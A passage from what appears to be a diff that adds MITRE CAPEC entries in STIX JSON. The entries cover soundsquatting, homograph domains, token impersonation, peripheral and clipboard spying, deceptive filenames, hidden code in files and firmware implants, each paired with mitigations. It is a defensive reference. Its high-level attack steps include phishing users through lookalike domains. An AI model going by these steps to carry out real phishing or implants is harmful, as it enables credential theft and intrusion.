  1. Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the SoundSquatted URL.

  2. Techniques
    Register the SoundSquatted domain.

Exploit

  1. Deceive user into visiting domain: Finally, the adversary needs to deceive a user into visiting the SoundSquatted domain.

  2. Techniques
    Execute a phishing attack and send a user an e-mail convincing the user to click on a link leading the user to the SoundSquatted domain.
    Assume that a user will unintentionally use the homophone in the URL, leading the user to the SoundSquatted domain.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL’s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73bbe3cf-9d46-458f-b272-44e8c8bdbfdd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "spec_version": "2.1", + "target_ref": "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Purchase potential SoundSquatted domains and forward to legitimate domain.", + "id": "course-of-action--4e3cac99-a7ec-420d-935d-3db74d0bb10a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-631-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a91eb59a-9010-4d4f-baca-16b413704ed6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4e3cac99-a7ec-420d-935d-3db74d0bb10a", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary registers a domain name containing a homoglyph, leading the registered domain to appear the same as a trusted domain. A homograph attack leverages the fact that different characters among various character sets look the same to the user. Homograph attacks must generally be combined with other attacks, such as phishing attacks, in order to direct Internet traffic to the adversary-controlled destinations.", + "external_references": [ + { + "external_id": "CAPEC-632", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/632.html" + }, + { + "external_id": "CWE-1007", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1007.html" + } + ], + "id": "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Homograph Attack via Homoglyphs", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "Homoglyph Attack" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful Homograph attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + 
"x_capec_example_instances": [ + "\n An adversary sends an email, impersonating bankofamerica.com to a user stating that they have just received a new deposit and to click the given link to confirm the deposit.\n However, the link the in email is bankofamerica.com, where the 'a' and 'e' characters are Cyrillic and not ASCII, instead of bankofamerica.com (all ASCII), which the user clicks after carefully reading the URL, making sure that typosquatting and soundsquatting attacks are not being leveraged against them.\n The user is directed to the adversary's website, which appears as if it is the legitimate bankofamerica.com login page.\n The user thinks they are logging into their account, but have actually just given their bankofamerica.com credentials to the adversary. The adversary can now use the user's legitimate bankofamerica.com credentials to log into the user's account and steal any money which may be in the account.\n Homograph vulnerability allows an adversary to impersonate a trusted domain by leveraging homoglyphs and tricking a user into visiting the malicious website to steal user credentials.See also: CVE-2012-0584 CVE-2009-0652 CVE-2005-0233 CVE-2005-0234 CVE-2005-0235 CVE-2005-0236 CVE-2005-0237 CVE-2005-0238" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target website: The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.

  2. Techniques
    Research popular or high traffic websites.

Experiment

  1. Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the URL containing the homoglpyh character(s).

  2. Techniques
    Register the Homograph domain.

Exploit

  1. Deceive user into visiting domain: Finally, the adversary needs to deceive a user into visiting the Homograph domain.

  2. Techniques
    Execute a phishing attack and send a user an e-mail convincing the to click on a link leading the user to the malicious domain.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL’s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc79c713-e3ec-414c-8426-5e3cdf4a0f13", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize browsers that can warn users if URLs contain characters from different character sets.", + "id": "course-of-action--676ce84f-78c4-40f9-96e2-d65ddbfb6b69", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-632-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--676ce84f-78c4-40f9-96e2-d65ddbfb6b69", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-04-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authentication to create an access token (or equivalent) that impersonates a different entity, and then associates a process/thread to that that impersonated token. This action causes a downstream user to make a decision or take action that is based on the assumed identity, and not the response that blocks the adversary.", + "external_references": [ + { + "external_id": "CAPEC-633", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/633.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-1270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1270.html" + }, + { + "description": "Access Token Manipulation", + "external_id": "T1134", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1134" + } + ], + "id": "attack-pattern--bec2babe-f38d-49ed-a901-4c7dbbe87b1e", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Token Impersonation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic (By faking the source of data or services, an adversary can cause a target to make incorrect decisions about how to proceed.)", + "Gain Privileges (By impersonating identities that have an increased level of access, an adversary gain privilege that they many not have otherwise had.)", + "Hide Activities (Faking the source of data or services 
can be used to create a false trail in logs as the target will associated any actions with the impersonated identity instead of the adversary.)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_prerequisites": [ + "This pattern of attack is only applicable when a downstream user leverages tokens to verify identity, and then takes action based on that identity." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary exploits the target system's audio and video functionalities through malware or scheduled tasks. The goal is to capture sensitive information about the target for financial, personal, political, or other gains which is accomplished by collecting communication data between two parties via the use of peripheral devices (e.g. microphones and webcams) or applications with audio and video capabilities (e.g. 
Skype) on a system.", + "external_references": [ + { + "external_id": "CAPEC-634", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/634.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "description": "Audio Capture", + "external_id": "T1123", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1123" + }, + { + "description": "Video Capture", + "external_id": "T1125", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1125" + }, + { + "description": "Amrita Mitra, What is Car Whisperer?, 2017--03---08, The Security Buddy", + "external_id": "REF-653", + "source_name": "reference_from_CAPEC", + "url": "https://www.thesecuritybuddy.com/bluetooth-security/what-is-car-whisperer/" + }, + { + "description": "What is Bluesnarfing?, 2017--03---13, Finjan Mobile", + "external_id": "REF-654", + "source_name": "reference_from_CAPEC", + "url": "https://www.finjanmobile.com/what-is-bluesnarfing/" + } + ], + "id": "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Probe Audio and Video Peripherals", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Software" + ], + "x_capec_example_instances": [ + "An adversary can capture audio and video, and transmit the recordings to a C2 server or a similar capability.", + "An adversary can capture and record from audio peripherals in a vehicle via a Car Whisperer attack. 
If an adversary is within close proximity to a vehicle with Bluetooth capabilities, they may attempt to connect to the hands-free system when it is in pairing mode. With successful authentication, if an authentication system is present at all, an adversary may be able to play music/voice recordings, as well begin a recording and capture conversations happening inside the vehicle. Successful authentication relies on the pairing security key being set to a default value, or by brute force (which may be less practical in an outside environment) Depending on the sensitivity of the information being discussed, this scenario can be extremely compromising.", + "An adversary may also use a technique called Bluebugging, which is similar to Bluesnarfing but requires the adversary to be between 10-15 meters of the target device. Bluebugging creates a backdoor for an attacker to listen/record phone calls, forward calls, send SMS and retrieve the phonebook." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Knowledge of the target device's or application’s vulnerabilities that can be capitalized on with malicious code. The adversary must be able to place the malicious code on the target device." + ], + "x_capec_skills_required": { + "High": "To deploy a hidden process or malware on the system to automatically collect audio and video data." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent unknown code from executing on a system through the use of an allowlist policy.", + "id": "course-of-action--d2376771-bf07-4a50-828d-05fdda76a87f", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-634-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cbf046fa-0379-4600-9440-4e02b4dba1f4", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d2376771-bf07-4a50-828d-05fdda76a87f", + "spec_version": "2.1", + "target_ref": "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Patch installed applications as soon as new updates become available.", + "id": "course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-634-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4780d621-4627-424b-903c-3f4d714d86a1", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c", + "spec_version": "2.1", + "target_ref": "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The extension of a file name is often used in various contexts to determine the application that is used to open and use it. If an attacker can cause an alternative application to be used, it may be able to execute malicious code, cause a denial of service or expose sensitive information.", + "external_references": [ + { + "external_id": "CAPEC-635", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/635.html" + }, + { + "external_id": "CWE-162", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/162.html" + }, + { + "description": "Masquerading: Double File Extension", + "external_id": "T1036.007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/007" + } + ], + "id": "attack-pattern--95afb65f-ece7-4511-85a3-d7bfb9973022", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Alternative Execution Due to Deceptive Filenames", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--74a4fb36-83cb-4851-b09c-370f1a408523", + "attack-pattern--f18ec51a-9ecd-49bf-9b91-5f5288306f70" + ], + "x_capec_prerequisites": [ + "The use of the file must be controlled by the file extension." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Applications should insure that the content of the file is consistent with format it is expecting, and not depend solely on the file extension.", + "id": "course-of-action--0ef2d26f-fc33-4b45-8b2f-ea08dd776b12", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-635-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d2c9b192-26b4-46a5-a6c9-aca496c5e896", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0ef2d26f-fc33-4b45-8b2f-ea08dd776b12", + "spec_version": "2.1", + "target_ref": "attack-pattern--95afb65f-ece7-4511-85a3-d7bfb9973022", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Files on various operating systems can have a complex format which allows for the storage of other data, in addition to its contents. Often this is metadata about the file, such as a cached thumbnail for an image file. Unless utilities are invoked in a particular way, this data is not visible during the normal use of the file. 
It is possible for an attacker to store malicious data or code using these facilities, which would be difficult to discover.", + "external_references": [ + { + "external_id": "CAPEC-636", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/636.html" + }, + { + "external_id": "CWE-506", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/506.html" + }, + { + "description": "Data Obfuscation: Steganography", + "external_id": "T1001.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1001/002" + }, + { + "description": "Obfuscated Files or Information: Steganography", + "external_id": "T1027.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/003" + }, + { + "description": "Obfuscated Files or Information: Compile After Delivery", + "external_id": "T1027.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/004" + }, + { + "description": "Signed Binary Proxy Execution: Compiled HTML File", + "external_id": "T1218.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1218/001" + }, + { + "description": "Template Injection", + "external_id": "T1221", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1221" + }, + { + "description": "Means, Ryan L., Alternate Data Streams: Out of the Shadows and into the Light, SANS Institute", + "external_id": "REF-493", + "source_name": "reference_from_CAPEC", + "url": "https://www.giac.org/paper/gcwn/230/alternate-data-streams-shadows-light/104234" + } + ], + "id": "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Hiding Malicious Data or Code within Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + 
"attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112", + "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87" + ], + "x_capec_prerequisites": [ + "The operating system must support a file system that allows for alternate data storage for a file." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Many tools are available to search for the hidden data. Scan regularly for such data using one of these tools.", + "id": "course-of-action--9a689051-a57a-41f3-a56f-4caedb91d329", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-636-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a689051-a57a-41f3-a56f-4caedb91d329", + "spec_version": "2.1", + "target_ref": "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary exploits an application that allows for the copying of sensitive data or information by collecting information copied to the clipboard. 
Data copied to the clipboard can be accessed by other applications, such as malware built to exfiltrate or log clipboard contents on a periodic basis. In this way, the adversary aims to garner information to which they are unauthorized.", + "external_references": [ + { + "external_id": "CAPEC-637", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/637.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "description": "Clipboard Data", + "external_id": "T1115", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1115" + } + ], + "id": "attack-pattern--60ceb889-a284-44bb-ae05-4b7e347e1597", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Collect Data from Clipboard", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find an application that allows copying sensititve data to clipboad: An adversary first needs to find an application that allows copying and pasting of sensitive information. This could be an application that prints out temporary passwords to the screen, private email addresses, or any other sensitive information or data

Experiment

  1. Target users of the application: An adversary will target users of the application in order to obtain the information in their clipboard on a periodic basic

  2. Techniques
    Install malware on a user's system designed to log clipboard contents periodically
    Get the user to click on a malicious link that will bring them to an application to log the contents of the clipboard

Exploit

  1. Follow-up attack: Use any sensitive information found to carry out a follow-up attack

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have a means (i.e., a pre-installed tool or background process) by which to collect data from the clipboard and store it. That is, when the target copies data to the clipboard (e.g., to paste into another application), the adversary needs some means of capturing that data in a third location." + ], + "x_capec_skills_required": { + "High": "To deploy a hidden process or malware on the system to automatically collect clipboard data." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "While copying and pasting of data with the clipboard is a legitimate and practical function, certain situations and context may require the disabling of this feature. Just as certain applications disable screenshot capability, applications that handle highly sensitive information should consider disabling copy and paste functionality.", + "id": "course-of-action--59dd4ce4-6777-41cd-ae1f-56718a9b85a1", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-637-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ca571029-201a-4dbc-aaa9-e3179a745f60", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59dd4ce4-6777-41cd-ae1f-56718a9b85a1", + "spec_version": "2.1", + "target_ref": "attack-pattern--60ceb889-a284-44bb-ae05-4b7e347e1597", + "type": "relationship", + "x_capec_version": "3.9" + }, + { 
+ "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ a robust identification and audit/blocking via using an allowlist of applications on your system. Malware may contain the functionality associated with this attack pattern.", + "id": "course-of-action--2d0dcdc8-f803-406a-8cd3-f6e1207c9ed7", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-637-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--19f949ab-5e38-4bef-be5d-dcdcfbc6b2eb", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2d0dcdc8-f803-406a-8cd3-f6e1207c9ed7", + "spec_version": "2.1", + "target_ref": "attack-pattern--60ceb889-a284-44bb-ae05-4b7e347e1597", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits systems features and/or improperly protected firmware of hardware components, such as Hard Disk Drives (HDD), with the goal of executing malicious code from within the component's Master Boot Record (MBR). Conducting this type of attack entails the adversary infecting the target with firmware altering malware, using known tools, and a payload. Once this malware is executed, the MBR is modified to include instructions to execute the payload at desired intervals and when the system is booted up. 
A successful attack will obtain persistence within the victim system even if the operating system is reinstalled and/or if the component is formatted or has its data erased.", + "external_references": [ + { + "external_id": "CAPEC-638", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/638.html" + }, + { + "description": "Pre-OS Boot:Component Firmware", + "external_id": "T1542.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1542/002" + }, + { + "description": "EQUATION GROUP: QUESTIONS AND ANSWERS (1.5), 2015--02, Kaspersky Lab HQ", + "external_id": "REF-664", + "source_name": "reference_from_CAPEC", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf" + }, + { + "description": "Preston Hood, Hard Drive Firmware Implant IRATEMONK, 2014--10---26, PJHoodsCo Blog", + "external_id": "REF-665", + "source_name": "reference_from_CAPEC", + "url": "https://blog.pjhoodsco.org/hard-drive-firmware-implant-iratemonk/" + }, + { + "description": "Bruce Schneier, IRATEMONK: NSA Exploit of the Day, 2014--01---31, Schneier on Security", + "external_id": "REF-666", + "source_name": "reference_from_CAPEC", + "url": "https://www.schneier.com/blog/archives/2014/01/iratemonk_nsa_e.html" + } + ], + "id": "attack-pattern--92df4967-ec90-4dc6-a8da-739892e850a4", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Altered Component Firmware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4cfba0b3-4740-49ae-bbb4-2dad27886239" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data", + "Modify Data" + ], + "Authentication": [ + "Gain Privileges", + "Execute Unauthorized Commands", + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": 
[ + "Gain Privileges", + "Execute Unauthorized Commands", + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "In 2014, the Equation group was observed levering known malware tools to conduct component firmware alteration attacks against hard drives. In total, 12 HDD categories were shown to be vulnerable from manufacturers such as Western Digital, HGST, Samsung, and Seagate. Because of their complexity, only a few victims were targeted by these attacks. [REF-664]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Select Target: The adversary searches for a suitable target to attack, such as government and/or private industry organizations.

  2. Techniques
    Conduct reconnaissance to determine potential targets to exploit.
  3. Identify Components: After selecting a target, the adversary determines whether a vulnerable component, such as a specific make and model of a HDD, is contained within the target system.

  4. Techniques
    [Remote Access Vector] The adversary gains remote access to the target, typically via additional malware, and explores the system to determine hardware components that are being leveraged.
    [Physical Access Vector] The adversary intercepts components in transit and determines if the component is vulnerable to attack.

Experiment

